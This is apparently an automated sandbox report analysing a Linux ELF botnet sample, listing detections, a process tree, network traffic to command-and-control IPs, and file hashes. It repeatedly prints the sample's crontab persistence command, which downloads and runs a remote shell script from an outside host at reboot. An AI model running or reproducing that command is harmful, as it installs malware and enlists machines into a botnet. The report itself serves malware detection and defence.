Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nshsh4.elf

Overview

General Information

Sample name:nshsh4.elf
Analysis ID:1552941
MD5:115387d0ce24b8a053354d2fbb3286e6
SHA1:694b60e53c9920a25921ba417a4aab1933944527
SHA256:17789e0fa6307d7e0eccf5c7480d3e4ddb0790a7f135b866f1c929ff1f089bef
Tags:elfuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1552941
Start date and time:2024-11-09 23:03:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 31s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nshsh4.elf
Detection:MAL
Classification:mal60.troj.linELF@0/1@22/0
  • VT rate limit hit for: nshsh4.elf
Command:/tmp/nshsh4.elf
PID:6237
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • nshsh4.elf (PID: 6237, Parent: 6155, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/nshsh4.elf
    • sh (PID: 6239, Parent: 6237, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 6245, Parent: 6239)
        • sh New Fork (PID: 6247, Parent: 6245)
        • crontab (PID: 6247, Parent: 6245, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 6246, Parent: 6239)
      • crontab (PID: 6246, Parent: 6239, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nshsh4.elfReversingLabs: Detection: 15%
Source: tmp.CYmbDw.19.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 193.233.193.45 ports 17454,8554,1,4,5,7,15965
Source: global trafficTCP traffic: 91.149.218.232 ports 20750,0,1,2,4,15588,11204
Source: global trafficTCP traffic: 91.149.238.18 ports 0,1,5,6,7,10765
Source: global trafficTCP traffic: 192.168.2.23:43014 -> 193.233.193.45:17454
Source: global trafficTCP traffic: 192.168.2.23:48180 -> 81.29.149.178:6538
Source: global trafficTCP traffic: 192.168.2.23:34916 -> 91.149.238.18:10765
Source: global trafficTCP traffic: 192.168.2.23:43078 -> 91.149.218.232:11204
Source: global trafficTCP traffic: 192.168.2.23:51544 -> 31.13.248.89:7293
Source: /tmp/nshsh4.elf (PID: 6237)Socket: 127.0.0.1:1172Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: tmp.CYmbDw.19.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal60.troj.linELF@0/1@22/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6247)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6246)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 6246)File: /var/spool/cron/crontabs/tmp.CYmbDwJump to behavior
Source: /usr/bin/crontab (PID: 6246)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/nshsh4.elf (PID: 6239)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/nshsh4.elf (PID: 6237)Queries kernel information via 'uname': Jump to behavior
Source: nshsh4.elf, 6237.1.00007ffcb2351000.00007ffcb2372000.rw-.sdmp, nshsh4.elf, 6248.1.00007ffcb2351000.00007ffcb2372000.rw-.sdmp, nshsh4.elf, 6290.1.00007ffcb2351000.00007ffcb2372000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sh4/tmp/nshsh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshsh4.elf
Source: nshsh4.elf, 6237.1.00007ffcb2351000.00007ffcb2372000.rw-.sdmp, nshsh4.elf, 6248.1.00007ffcb2351000.00007ffcb2372000.rw-.sdmp, nshsh4.elf, 6290.1.00007ffcb2351000.00007ffcb2372000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
Source: nshsh4.elf, 6237.1.0000559ee65f2000.0000559ee667a000.rw-.sdmp, nshsh4.elf, 6248.1.0000559ee65f2000.0000559ee667a000.rw-.sdmp, nshsh4.elf, 6290.1.0000559ee65f2000.0000559ee667a000.rw-.sdmpBinary or memory string: U5!/etc/qemu-binfmt/sh4
Source: nshsh4.elf, 6237.1.0000559ee65f2000.0000559ee667a000.rw-.sdmp, nshsh4.elf, 6248.1.0000559ee65f2000.0000559ee667a000.rw-.sdmp, nshsh4.elf, 6290.1.0000559ee65f2000.0000559ee667a000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4
Source: nshsh4.elf, 6290.1.00007ffcb2351000.00007ffcb2372000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
Direct Volume AccessOS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1552941 Sample: nshsh4.elf Startdate: 09/11/2024 Architecture: LINUX Score: 60 30 91.149.238.18, 10765, 34916 MARTON-ASPL Poland 2->30 32 91.149.218.232, 11204, 15588, 20750 GECKONET-ASPL Poland 2->32 34 6 other IPs or domains 2->34 40 Multi AV Scanner detection for submitted file 2->40 42 Connects to many ports of the same IP (likely port scanning) 2->42 9 nshsh4.elf 2->9         started        signatures3 process4 process5 11 nshsh4.elf sh 9->11         started        13 nshsh4.elf 9->13         started        15 nshsh4.elf 9->15         started        process6 17 sh crontab 11->17         started        21 sh 11->21         started        23 nshsh4.elf 13->23         started        file7 28 /var/spool/cron/crontabs/tmp.CYmbDw, ASCII 17->28 dropped 36 Sample tries to persist itself using cron 17->36 38 Executes the "crontab" command typically for achieving persistence 17->38 25 sh crontab 21->25         started        signatures8 process9 signatures10 44 Executes the "crontab" command typically for achieving persistence 25->44
SourceDetectionScannerLabelLink
nshsh4.elf16%ReversingLabsLinux.Backdoor.Gafgyt
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
kingstonwikkerink.dyn
81.29.149.178
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://hailcocks.ru/wget.sh;tmp.CYmbDw.19.drfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      193.233.193.45
      unknownRussian Federation
      2895FREE-NET-ASFREEnetEUtrue
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      91.149.218.232
      unknownPoland
      198401GECKONET-ASPLtrue
      31.13.248.89
      unknownBulgaria
      34224NETERRA-ASBGfalse
      81.29.149.178
      kingstonwikkerink.dynSwitzerland
      39616COMUNICA_IT_SERVICESCHfalse
      91.149.238.18
      unknownPoland
      41952MARTON-ASPLtrue
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      193.233.193.45nsharm5.elfGet hashmaliciousUnknownBrowse
        nsharm.elfGet hashmaliciousUnknownBrowse
          nshppc.elfGet hashmaliciousUnknownBrowse
            nshmips.elfGet hashmaliciousUnknownBrowse
              arm7.elfGet hashmaliciousUnknownBrowse
                mpsl.elfGet hashmaliciousUnknownBrowse
                  arm5.elfGet hashmaliciousUnknownBrowse
                    arm4.elfGet hashmaliciousUnknownBrowse
                      mpsl.elfGet hashmaliciousUnknownBrowse
                        arm7-20241104-0018.elfGet hashmaliciousUnknownBrowse
                          109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                          • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                          91.149.218.232nsharm7.elfGet hashmaliciousUnknownBrowse
                            nsharm5.elfGet hashmaliciousUnknownBrowse
                              nsharm.elfGet hashmaliciousUnknownBrowse
                                nshppc.elfGet hashmaliciousUnknownBrowse
                                  nshmips.elfGet hashmaliciousUnknownBrowse
                                    arm7.elfGet hashmaliciousUnknownBrowse
                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                        arm5.elfGet hashmaliciousUnknownBrowse
                                          arm4.elfGet hashmaliciousUnknownBrowse
                                            mpsl.elfGet hashmaliciousUnknownBrowse
                                              31.13.248.89nsharm7.elfGet hashmaliciousUnknownBrowse
                                                nshppc.elfGet hashmaliciousUnknownBrowse
                                                  nshmips.elfGet hashmaliciousUnknownBrowse
                                                    harm5.elfGet hashmaliciousUnknownBrowse
                                                      arm7.elfGet hashmaliciousUnknownBrowse
                                                        mpsl.elfGet hashmaliciousUnknownBrowse
                                                          arm4.elfGet hashmaliciousUnknownBrowse
                                                            tarm6.elfGet hashmaliciousMiraiBrowse
                                                              mpsl.elfGet hashmaliciousUnknownBrowse
                                                                arm7-20241104-0018.elfGet hashmaliciousUnknownBrowse
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  kingstonwikkerink.dynnsharm7.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.149.218.232
                                                                  nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 217.28.130.41
                                                                  nsharm.elfGet hashmaliciousUnknownBrowse
                                                                  • 81.29.149.178
                                                                  nshppc.elfGet hashmaliciousUnknownBrowse
                                                                  • 217.28.130.41
                                                                  nshmips.elfGet hashmaliciousUnknownBrowse
                                                                  • 31.13.248.89
                                                                  ppc.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.149.238.18
                                                                  tarm7.elfGet hashmaliciousMiraiBrowse
                                                                  • 213.182.204.57
                                                                  tppc.elfGet hashmaliciousMiraiBrowse
                                                                  • 88.151.195.22
                                                                  harm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 217.28.130.41
                                                                  tarm.elfGet hashmaliciousMiraiBrowse
                                                                  • 88.151.195.22
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  NETERRA-ASBGnsharm7.elfGet hashmaliciousUnknownBrowse
                                                                  • 31.13.248.89
                                                                  nshppc.elfGet hashmaliciousUnknownBrowse
                                                                  • 31.13.248.89
                                                                  nshmips.elfGet hashmaliciousUnknownBrowse
                                                                  • 31.13.248.89
                                                                  harm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 31.13.248.89
                                                                  arm7.elfGet hashmaliciousUnknownBrowse
                                                                  • 31.13.248.89
                                                                  mpsl.elfGet hashmaliciousUnknownBrowse
                                                                  • 31.13.248.89
                                                                  arm4.elfGet hashmaliciousUnknownBrowse
                                                                  • 31.13.248.89
                                                                  tarm6.elfGet hashmaliciousMiraiBrowse
                                                                  • 31.13.248.89
                                                                  sora.arm7.elfGet hashmaliciousUnknownBrowse
                                                                  • 87.121.79.128
                                                                  mpsl.elfGet hashmaliciousUnknownBrowse
                                                                  • 31.13.248.89
                                                                  INIT7CHarm6.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 109.202.202.202
                                                                  mpsl.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  bot.m68k.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                  • 109.202.202.202
                                                                  bot.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 109.202.202.202
                                                                  bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 109.202.202.202
                                                                  bot.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 109.202.202.202
                                                                  spc.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  bot.x86_64.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 109.202.202.202
                                                                  sshd.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  GECKONET-ASPLnsharm7.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.149.218.232
                                                                  nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.149.218.232
                                                                  nsharm.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.149.218.232
                                                                  nshppc.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.149.218.232
                                                                  nshmips.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.149.218.232
                                                                  arm7.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.149.218.232
                                                                  mpsl.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.149.218.232
                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.149.218.232
                                                                  arm4.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.149.218.232
                                                                  mpsl.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.149.218.232
                                                                  FREE-NET-ASFREEnetEUnsharm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 193.233.193.45
                                                                  nsharm.elfGet hashmaliciousUnknownBrowse
                                                                  • 193.233.193.45
                                                                  nshppc.elfGet hashmaliciousUnknownBrowse
                                                                  • 193.233.193.45
                                                                  nshmips.elfGet hashmaliciousUnknownBrowse
                                                                  • 193.233.193.45
                                                                  boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                  • 147.45.42.138
                                                                  boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                  • 147.45.42.138
                                                                  boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                                  • 147.45.42.138
                                                                  boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                                  • 147.45.42.138
                                                                  TZ33WZy6QL.exeGet hashmaliciousLummaCBrowse
                                                                  • 147.45.44.131
                                                                  boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                                  • 147.45.42.138
                                                                  No context
                                                                  No context
                                                                  Process:/usr/bin/crontab
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):306
                                                                  Entropy (8bit):5.158759951523546
                                                                  Encrypted:false
                                                                  SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQuc1ZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJD:8QjHig8uieHLUHYC+GABjnOGAFkz
                                                                  MD5:5D2F88F76EFB4AF777291DDEAFD17513
                                                                  SHA1:DB60928962F729CE1FAA88A0C3E2218248304EFD
                                                                  SHA-256:1D74D36C572590544329BCE08E6764EBFC8B1A05BC44F9A104DCA08BB2C4BAA3
                                                                  SHA-512:D8D6F1F601A6BEA97D7250DE78286CC75FDD661F74C74AF1A7CB7E12FA8E4BECF3D41EB595337B580D81A10682C9E588F55FB12F27DF668EF5CB936A874C8835
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Nov 9 16:03:49 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                                                  File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
                                                                  Entropy (8bit):6.892687714236376
                                                                  TrID:
                                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                  File name:nshsh4.elf
                                                                  File size:67'860 bytes
                                                                  MD5:115387d0ce24b8a053354d2fbb3286e6
                                                                  SHA1:694b60e53c9920a25921ba417a4aab1933944527
                                                                  SHA256:17789e0fa6307d7e0eccf5c7480d3e4ddb0790a7f135b866f1c929ff1f089bef
                                                                  SHA512:b96a8edc6e4c2bd3ecc98ce923173e1c7488850303196b1076f71cac9801e20e221b1d9be7a1ede1cac6a38f30339eb73cc1a52bdb72e4d5c8fbe234b1796035
                                                                  SSDEEP:1536:AmFrMb5+kyikbHaKCR/5vXbECFarh+rbK:ASMN9yiCH9CbXbERVEbK
                                                                  TLSH:A4639D23DD6A6E58C16E4AF0B4B48F391323E544D25B0EBB1AA9C6769043EDCF1057F8
                                                                  File Content Preview:.ELF..............*.......@.4...\.......4. ...(...............@...@.t...t...............x...x.B.x.B......T..........Q.td............................././"O.n........#.*@........#.*@.....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

                                                                  ELF header

                                                                  Class:ELF32
                                                                  Data:2's complement, little endian
                                                                  Version:1 (current)
                                                                  Machine:<unknown>
                                                                  Version Number:0x1
                                                                  Type:EXEC (Executable file)
                                                                  OS/ABI:UNIX - System V
                                                                  ABI Version:0
                                                                  Entry Point Address:0x4001a0
                                                                  Flags:0x9
                                                                  ELF Header Size:52
                                                                  Program Header Offset:52
                                                                  Program Header Size:32
                                                                  Number of Program Headers:3
                                                                  Section Header Offset:67420
                                                                  Section Header Size:40
                                                                  Number of Section Headers:11
                                                                  Header String Table Index:10
                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                  NULL0x00x00x00x00x0000
                                                                  .initPROGBITS0x4000940x940x300x00x6AX004
                                                                  .textPROGBITS0x4000e00xe00xe9000x00x6AX0032
                                                                  .finiPROGBITS0x40e9e00xe9e00x240x00x6AX004
                                                                  .rodataPROGBITS0x40ea040xea040x19700x00x2A004
                                                                  .ctorsPROGBITS0x4203780x103780x80x00x3WA004
                                                                  .dtorsPROGBITS0x4203800x103800x80x00x3WA004
                                                                  .dataPROGBITS0x42038c0x1038c0x37c0x00x3WA004
                                                                  .gotPROGBITS0x4207080x107080x100x40x3WA004
                                                                  .bssNOBITS0x4207180x107180x50fc0x00x3WA004
                                                                  .shstrtabSTRTAB0x00x107180x430x00x0001
                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                  LOAD0x00x4000000x4000000x103740x103746.94230x5R E0x10000.init .text .fini .rodata
                                                                  LOAD0x103780x4203780x4203780x3a00x549c2.85870x6RW 0x10000.ctors .dtors .data .got .bss
                                                                  GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 9, 2024 23:03:51.933407068 CET43928443192.168.2.2391.189.91.42
                                                                  Nov 9, 2024 23:03:54.546072960 CET4301417454192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:03:54.553699970 CET1745443014193.233.193.45192.168.2.23
                                                                  Nov 9, 2024 23:03:54.553760052 CET4301417454192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:03:54.553904057 CET4301417454192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:03:54.561676025 CET1745443014193.233.193.45192.168.2.23
                                                                  Nov 9, 2024 23:03:54.561722994 CET4301417454192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:03:54.569339991 CET1745443014193.233.193.45192.168.2.23
                                                                  Nov 9, 2024 23:03:55.901957035 CET1745443014193.233.193.45192.168.2.23
                                                                  Nov 9, 2024 23:03:55.901978970 CET1745443014193.233.193.45192.168.2.23
                                                                  Nov 9, 2024 23:03:55.902019978 CET4301417454192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:03:55.902020931 CET4301417454192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:03:55.902206898 CET4301417454192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:03:57.308685064 CET42836443192.168.2.2391.189.91.43
                                                                  Nov 9, 2024 23:03:59.100449085 CET4251680192.168.2.23109.202.202.202
                                                                  Nov 9, 2024 23:04:10.944195986 CET5938815965192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:04:10.949018955 CET1596559388193.233.193.45192.168.2.23
                                                                  Nov 9, 2024 23:04:10.949086905 CET5938815965192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:04:10.949132919 CET5938815965192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:04:10.953972101 CET1596559388193.233.193.45192.168.2.23
                                                                  Nov 9, 2024 23:04:10.954030991 CET5938815965192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:04:10.958892107 CET1596559388193.233.193.45192.168.2.23
                                                                  Nov 9, 2024 23:04:12.308038950 CET1596559388193.233.193.45192.168.2.23
                                                                  Nov 9, 2024 23:04:12.308242083 CET5938815965192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:04:12.308279037 CET5938815965192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:04:12.666649103 CET43928443192.168.2.2391.189.91.42
                                                                  Nov 9, 2024 23:04:22.328784943 CET359588554192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:04:22.333621025 CET855435958193.233.193.45192.168.2.23
                                                                  Nov 9, 2024 23:04:22.333709955 CET359588554192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:04:22.333758116 CET359588554192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:04:22.338553905 CET855435958193.233.193.45192.168.2.23
                                                                  Nov 9, 2024 23:04:22.338752031 CET359588554192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:04:22.343489885 CET855435958193.233.193.45192.168.2.23
                                                                  Nov 9, 2024 23:04:22.905324936 CET42836443192.168.2.2391.189.91.43
                                                                  Nov 9, 2024 23:04:23.713457108 CET855435958193.233.193.45192.168.2.23
                                                                  Nov 9, 2024 23:04:23.713694096 CET359588554192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:04:23.713773966 CET359588554192.168.2.23193.233.193.45
                                                                  Nov 9, 2024 23:04:28.751091957 CET481806538192.168.2.2381.29.149.178
                                                                  Nov 9, 2024 23:04:28.755934000 CET65384818081.29.149.178192.168.2.23
                                                                  Nov 9, 2024 23:04:28.756032944 CET481806538192.168.2.2381.29.149.178
                                                                  Nov 9, 2024 23:04:28.756081104 CET481806538192.168.2.2381.29.149.178
                                                                  Nov 9, 2024 23:04:28.762275934 CET65384818081.29.149.178192.168.2.23
                                                                  Nov 9, 2024 23:04:28.762341976 CET481806538192.168.2.2381.29.149.178
                                                                  Nov 9, 2024 23:04:28.768455982 CET65384818081.29.149.178192.168.2.23
                                                                  Nov 9, 2024 23:04:29.048614025 CET4251680192.168.2.23109.202.202.202
                                                                  Nov 9, 2024 23:04:29.711940050 CET65384818081.29.149.178192.168.2.23
                                                                  Nov 9, 2024 23:04:29.711986065 CET65384818081.29.149.178192.168.2.23
                                                                  Nov 9, 2024 23:04:29.712405920 CET481806538192.168.2.2381.29.149.178
                                                                  Nov 9, 2024 23:04:29.712407112 CET481806538192.168.2.2381.29.149.178
                                                                  Nov 9, 2024 23:04:29.712407112 CET481806538192.168.2.2381.29.149.178
                                                                  Nov 9, 2024 23:04:44.787225962 CET3491610765192.168.2.2391.149.238.18
                                                                  Nov 9, 2024 23:04:44.793601036 CET107653491691.149.238.18192.168.2.23
                                                                  Nov 9, 2024 23:04:44.793659925 CET3491610765192.168.2.2391.149.238.18
                                                                  Nov 9, 2024 23:04:44.793680906 CET3491610765192.168.2.2391.149.238.18
                                                                  Nov 9, 2024 23:04:44.800295115 CET107653491691.149.238.18192.168.2.23
                                                                  Nov 9, 2024 23:04:44.800357103 CET3491610765192.168.2.2391.149.238.18
                                                                  Nov 9, 2024 23:04:44.805162907 CET107653491691.149.238.18192.168.2.23
                                                                  Nov 9, 2024 23:04:45.688066959 CET107653491691.149.238.18192.168.2.23
                                                                  Nov 9, 2024 23:04:45.688168049 CET107653491691.149.238.18192.168.2.23
                                                                  Nov 9, 2024 23:04:45.688417912 CET3491610765192.168.2.2391.149.238.18
                                                                  Nov 9, 2024 23:04:45.688417912 CET3491610765192.168.2.2391.149.238.18
                                                                  Nov 9, 2024 23:04:45.688417912 CET3491610765192.168.2.2391.149.238.18
                                                                  Nov 9, 2024 23:04:53.621387959 CET43928443192.168.2.2391.189.91.42
                                                                  Nov 9, 2024 23:05:00.711292982 CET4307811204192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:00.716078043 CET112044307891.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:00.716162920 CET4307811204192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:00.716217041 CET4307811204192.168.2.2391.149.218.232
